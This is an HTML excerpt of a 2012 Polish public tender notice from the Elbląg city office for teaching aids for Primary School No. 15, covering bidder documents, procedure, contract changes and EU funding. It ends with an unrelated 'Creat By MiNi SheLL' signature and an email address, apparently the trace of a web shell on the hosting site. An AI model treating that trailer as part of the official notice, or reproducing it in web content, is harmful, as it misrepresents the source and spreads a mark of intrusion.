<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga:
Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ.
Oświadczenie należy składać w oryginale.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie.
    2.W przypadku zaoferowania przez Wykonawcę przedmiotów równoważnych opisywanym przez Zamawiającego, Wykonawca zobowiązany jest złożyć z ofertą dokument FORMULARZ CENOWY - Szczegółowy wykaz pomocy dydaktycznych do realizacji zajęć dodatkowych -Dostawa pomocy dydaktycznych na zajęcia dodatkowe w Szkole Podstawowej nr 15, stanowiący ZAŁĄCZNIK NR 4 do SIWZ, zawierający opisy parametrów przedmiotów, które Wykonawca oferuje jako równoważne do opisanych przez Zamawiającego w FORMULARZU CENOWYM - Szczegółowy wykaz pomocy dydaktycznych do realizacji zajęć dodatkowych -Dostawa pomocy dydaktycznych na zajęcia dodatkowe w Szkole Podstawowej nr 15, zawartym w ZAŁĄCZNIKU NR 4 do SIWZ.
Uwaga:
a)	Zamawiający wymaga, aby Wykonawca opisując przedmioty, które oferuje jako równoważne do opisanych przez Zamawiającego wskazał parametry oferowanych przedmiotów w zakresie wszystkich parametrów (Rodzaj przedmiotu, Materiał, Wymiary, Przeznaczenie) wymienionych przez Zamawiającego w FORMULARZU CENOWYM - Szczegółowy wykaz pomocy dydaktycznych do realizacji zajęć dodatkowych - Dostawa pomocy dydaktycznych na zajęcia dodatkowe w Szkole Podstawowej nr 15, zawartym w ZAŁĄCZNIKU NR 4 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stanowiące dowód, że Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w następujących przypadkach, gdy wyposażenie przedstawione w ofercie w momencie dostawy:
a)	nie będzie dostępne na rynku,
b)	będzie wycofane ze sprzedaży przez producenta,
c)	producenta wprowadzi nowszy model.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Departament Zamówień Publicznych pokój 403 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2012 godzina 09:30, miejsce: Urząd Miejski w Elblągu
Departament Zamówień Publicznych pokój 403
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający informuje, że  dostawa będzie realizowana w oparciu o Projekt systemowy finansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki.
2. Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA	
rozpoczęcie: data udzielenia zamówienia
zakończenie: 14 dni od daty udzielenia zamówienia 
3. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ:
Treść wymaganego Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ.
Oświadczenie należy składać w oryginale.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie (jeżeli każdy z Wykonawców spełnia warunki udziału samodzielnie).
4. Uwaga do oświadczenia wymienionego w pkt VI.A. ppkt 1. SIWZ:
Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2b do SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
 5. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 2. SIWZ:
a)  Treść wymaganego Oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo zamówień publicznych składanego przez osoby fizyczne Zamawiający przekazuje na ZAŁĄCZNIKU NR 2c do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument wymieniony w pkt VI.A. ppkt 2. SIWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
 6. Dotyczy Sekcji III.4.3) Dokumenty podmiotów zagranicznych:
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty zawierajace oświadczenia, że:
-	nie otwarto likwidacji Wykonawcy ani nie ogłoszono upadłości,
-	nie orzeczono wobec Wykonawcy zakazu ubiegania się o zamówienie,
powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Dokument zawierający oświadczenie, że:
-    Wykonawca nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
 powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
7. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.
8.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia.
UWAGA:
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com